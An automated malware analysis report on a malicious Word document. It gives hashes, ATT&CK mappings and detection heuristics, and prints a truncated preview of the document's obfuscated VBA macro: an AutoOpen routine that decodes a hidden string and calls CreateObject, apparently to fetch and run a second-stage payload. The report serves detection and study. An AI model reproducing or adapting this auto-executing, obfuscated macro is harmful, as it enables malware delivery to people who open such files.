Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a56bd3af6df1246…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 457.0 KB
Created: 2018-12-19 18:06:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: c6460a79e277ebae25bc91fe2e7e3851
SHA-1: c4f7c9361fb45ddce38aba81c54da5969d1c357f
SHA-256: 4a56bd3af6df1246286b9eebfd055cc060851e71346709628d3ff72175085693
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes CreateObject and Shell() calls, indicating an intent to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics (8)

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (the standard OOXML DrawingML schema namespace), found in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 68616 bytes
SHA-256: fc4833fdda3ee8381c645d2dce45ad2fb53a4befb730cf36d96c1f95fc8e3f77
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "sQYppTLCotAOVAwKmGl"
Sub AutoOpen()
Dim HCUgCTrhEczyc As String: HCUgCTrhEczyc = vZcCKRooQWIXQ("Dh4HEVNARQIbAARSRRNuRjVDb1AiV3IcH1dLEQ==")
lkSAYFPjAlGgNC.TWROvqCvkFAHOVAr (wcVrOCpLBDRplrHiCF(HCUgCTrhEczyc, "fjsaiojgiower$@)G$@)G$@(123tu89013tT*$T@()!#T)$T(RGIWKWEPEQF{fg]erpj;lksdf8924otgERGIW#*@#($TR(W@GUWG(@#RIDSJVXDASUIT("))
End Sub
Public Function BGcqSbFvoloBXHiypb(rtpQWcmioKTUTPcl As String) As Object
Dim ZigsemUogdi As Collection
Set ZigsemUogdi = New Collection
ZigsemUogdi.Add "RmwOZOnjESHlvc"
ZigsemUogdi.Add "QDKUHdTxGROAu"
ZigsemUogdi.Add "YCzAMXnKtoyRTdLVtZ"
ZigsemUogdi.Add "QqafkRvpSEhPOzhu"
ZigsemUogdi.Add "MEJmbCkDzRkVx"
ZigsemUogdi.Add "OXEvDisOFFcZpZZfML"
Set BGcqSbFvoloBXHiypb = VBA.CreateObject(rtpQWcmioKTUTPcl)
End Function
Public Function vZcCKRooQWIXQ(NGcYeSWwqWBUNwD As String, Optional BZuLpbNVRTvRFfWqC As Boolean = True) As String
Dim opBjnkOoToAkISbpj: opBjnkOoToAkISbpj = Array("dKiXtkcrdklxGA""ALEDuYGyRqNuHXrLbRa""RksJvkjGOPN""CMayGoumLSPnq""JIcbsOQwSpKtATfKM""lJyKCozjsLzjceD""zgDgfJTSspek")
Static RccTfUsvMmURR(0 To 255) As Byte
Dim DXTtYIiqTgBZHdSyqk As Collection
Set DXTtYIiqTgBZHdSyqk = New Collection
DXTtYIiqTgBZHdSyqk.Add "FaikxNQgSOwpoSU"
DXTtYIiqTgBZHdSyqk.Add "UagowtNOEUwKEpO"
DXTtYIiqTgBZHdSyqk.Add "aAwaDQApOYxijUEFo"
DXTtYIiqTgBZHdSyqk.Add "vpVwtHfGalhhSp"
Dim buPbuROcYYqlTRMZTlB() As Byte, fLmmaqidsaJlpt() As Byte
Dim rAIEZYgbWBzdjKMN As Integer
rAIEZYgbWBzdjKMN = 9 * 1
Dim HeRwylAyEIduC As Long, FXuYECZFqhd As Long
Dim NlXweQQqSCdL, vVHBAmCtGSP As Integer
NlXweQQqSCdL = 1
vVHBAmCtGSP = 85
While NlXweQQqSCdL < vVHBAmCtGSP
vVHBAmCtGSP = vVHBAmCtGSP - NlXweQQqSCdL
Wend
If RccTfUsvMmURR(0) = 0 Then
Dim ZrAODEQFQway, mStdFGRwygEeBiMv As Integer
For mStdFGRwygEeBiMv = 0 To 3
ZrAODEQFQway = ZrAODEQFQway + mStdFGRwygEeBiMv
Next mStdFGRwygEeBiMv
For HeRwylAyEIduC = 0 To 255
Dim FQggOPPsTVKAtXJEF, eobvNqmqpromJvij As Integer
FQggOPPsTVKAtXJEF = 7
eobvNqmqpromJvij = 66
While FQggOPPsTVKAtXJEF < eobvNqmqpromJvij
eobvNqmqpromJvij = eobvNqmqpromJvij - FQggOPPsTVKAtXJEF
Wend
RccTfUsvMmURR(HeRwylAyEIduC) = 255
Dim OazgVwCeYaGNc, BdPhbCCpnagdwgN As Integer
For BdPhbCCpnagdwgN = 0 To 1
OazgVwCeYaGNc = OazgVwCeYaGNc + BdPhbCCpnagdwgN
Next BdPhbCCpnagdwgN
Next HeRwylAyEIduC
Dim uEgAaqicFIEkRtUUf As Integer
uEgAaqicFIEkRtUUf = 4
Dim KxmmnhOHnRijyIebyw As Integer
KxmmnhOHnRijyIebyw = 2 - 7 * 1
If uEgAaqicFIEkRtUUf < Len(Application.UserName) Then
Dim docfnnfbfVTivvvxaSB, QeGsWglCEBPrOtm As Integer
For QeGsWglCEBPrOtm = 0 To 6
docfnnfbfVTivvvxaSB = docfnnfbfVTivvvxaSB + QeGsWglCEBPrOtm
Next QeGsWglCEBPrOtm
Dim bCKZuMsnGSlzAfxMW As Variant
End If
For HeRwylAyEIduC = 0 To 25
Dim ipZPaJOBTXkpFaIW, qSwENNFCmBNHFicRvtb As Integer
ipZPaJOBTXkpFaIW = 5
qSwENNFCmBNHFicRvtb = 38
While ipZPaJOBTXkpFaIW < qSwENNFCmBNHFicRvtb
qSwENNFCmBNHFicRvtb = qSwENNFCmBNHFicRvtb - ipZPaJOBTXkpFaIW
Wend
RccTfUsvMmURR(HeRwylAyEIduC + 65) = HeRwylAyEIduC
Dim GWHavjycgvwwKUoFs, ofokysBifkgminNBAGa As Integer
For ofokysBifkgminNBAGa = 0 To 7
GWHavjycgvwwKUoFs = GWHavjycgvwwKUoFs + ofokysBifkgminNBAGa
Next ofokysBifkgminNBAGa
Next HeRwylAyEIduC
Dim yXiAKOAgsuGslosdFu: yXiAKOAgsuGslosdFu = Array("xQdUkmGApdDMHyxugPJ")
For HeRwylAyEIduC = 26 To 51
Dim InbBscmMxAhyu, OAeXlNNEHKnsUxk As Integer
For OAeXlNNEHKnsUxk = 0 To 2
InbBscmMxAhyu = InbBscmMxAhyu + OAeXlNNEHKnsUxk
Next OAeXlNNEHKnsUxk
RccTfUsvMmURR(HeRwylAyEIduC + 71) = HeRwylAyEIduC
Dim fnLDlNKYeZCv As Integer
fnLDlNKYeZCv = 9
Dim bmVyHktIzDBxfrPfEC: bmVyHktIzDBxfrPfEC = Array("ZBiaBMykZIo""zVMGqpzbAyw""DkHWnbHezLNEsjhZj""VzLCiuuAnZqFXzr""txmrEggyeoKuA""IxHlHmSVWfZQAcQL""OgZupMyAuwxPfxvqFrM")
If fnLDlNKYeZCv < Len(Application.UserName) Then
Dim PLWHCnzTGPrKtwaJL As Collection
Set PLWHCnzTGPrKtwa
... (truncated)